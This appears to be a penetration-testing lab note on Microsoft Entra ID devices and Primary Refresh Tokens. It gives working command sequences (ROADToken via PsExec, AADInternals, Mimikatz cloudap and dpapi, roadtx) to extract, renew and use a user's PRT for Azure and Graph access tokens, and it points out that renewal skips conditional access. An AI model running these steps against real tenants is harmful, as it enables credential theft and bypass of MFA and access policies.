Entra ID Devices & Primary Refresh Tokens

There are three types of device identities:

  1. Microsoft Entra join

These are organization owned devices and heavily managed using Intune. Only Windows 11, 10 and Server 2019 machines running on Azure. These can be accessed using Azure AD accounts.

  1. Microsoft Entra registration

These can be used owned (BYOD) or organization owned. These are lightly managed. Can be Windows 10 or newer, macOS, Ubuntu and mobile devices.

  1. Microsoft Entra hybrid join

Organization owned devices joined to on-premise AD and registered with Entra ID. All supported Windows Desktops en server version

Primary Refresh Token

PRT is a special refresh token used for single sign-on. (SSO). It can be used to obtain access and refresh tokens to any application. It is issued to a user for a specific device. It is valid for 90 days and continuously renewed.

CloudAP SSP on Windows devices requests and caches a PRT on a device.

The idea of SSO is that when you have a Entra ID joined device, you want to be able to access any application without having to provide credentials again

MFA & PRT

If a PRT is MFA-based (Windows Hello or Account managed), then the claim is transferred to app tokens to prevent MFA challenge for every application. This means that if you RDP into a machine, it is not MFA based and the claim is not transferred.

Extract the PRT (Pass-the-PRT)

If we have access to a PRT, it is possible to request access tokens for any application. First check if there is a user AzureAD\username

Get-Process -IncludeUserName

Using ROADToken:

ROADToken.exe <nonce>

Request Nonce:

$TenantId = "2d50cb29-5f7b-48a4-87ce-xxxx"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce

Next, run the following command to execute from system privileges in the session of the Azure AD user ROADToken.exe:

Invoke-Command -Session $infraadminsrv -ScriptBlock{C:\Users\Public\student60\PsExec64.exe -accepteula -s "cmd.exe" " /c C:\Users\Public\student60\SessionExecCommand.exe MichaelMBarron C:\Users\Public\student60\ROADToken.exe AwABEgEAAAADAOz_BQD0_yt2x3cdZplKFPI7ne9soLemwZfxfXDveVCG1B3Zw_irkrK0oTfhPUHZTp0RhL9nrFgBxb3GuXd1jf2v83BptRYgAA > C:\Users\Public\student60\PRT.txt"}

AADInternals

Get-AADIntUserPRTToken

Mimikatz

Sekurlsa::cloudap

Mimikatz extract PRT, sessionkey and renew using Roadtx

First using mimikatz cloudap, extract the key value and the PRT itself:

Sekurlsa::cloudap

Copy the key value and PRT. Next, use dpapito extract the session key:

dpapi::cloudapkd /keyvalue:<VALUE> /unprotect

Finally, use roadtx to renew and save the PRT:

roadtx prt -a renew --prt <PRT> --prt-sessionkey <SESSION-KEY>

When a PRT is renewed conditional access is NOT checked

Now we can request a access token for azure resource manager:

roadtx prtauth -c azps -r azrm --tokens-stdout

Or for MSGraph:

roadtx prtauth -c azps -r msgraph --tokens-stdout

Or open a browser with the token already in place:

roadtx browserprtauth -url https://portal.azure.com

Last updated